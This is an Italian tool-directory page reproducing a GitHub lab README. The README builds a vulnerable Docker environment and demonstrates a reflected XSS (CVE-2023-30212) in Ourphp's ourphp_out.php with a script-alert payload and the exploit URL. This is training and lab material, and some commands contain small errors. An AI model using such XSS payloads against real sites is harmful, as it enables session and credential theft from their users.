Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/arunsnap/cve-2023-30212-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-30212-POC

Creazione di un ambiente Docker vulnerabile e sfruttamento della vulnerabilità in Ourphp versione 7.2.0 ( CVE 2023 30212 )

Passaggio 1. Scarica e installa Docker nel tuo sistema. Sto usando Docker perché è rapido e facile da installare ubuntu

Passaggio 2. Configura l'ambiente Docker

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

Passaggio 3. Installazione delle dipendenze

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

Passaggio 4. Installa il server web, PHP e MySQL. Per questo installerò il server xampp.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

Passaggio 5. Scarica Ourphp versione 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

Passaggio 6. Configura Ourphp nel browser. Apri il browser e inserisci localhost o 127.0.0.1. Segui le istruzioni e installa Ourphp

Passaggio 7. Sfruttamento della vulnerabilità. La versione Ourphp 7.2.0 presenta una vulnerabilità XSS (Cross-Site Scripting). Per mitigare la vulnerabilità nel file /client/manage /ourphp_out.php che consente l'esecuzione di codice XSS

login finding

devi modificare il codice. La vulnerabilità si presenta quando il parametro "ourphp_admin" è impostato su "logout," e la variabile controllabile è "out"

final

Prova di concetto

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

video

video
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

Scarica lo strumento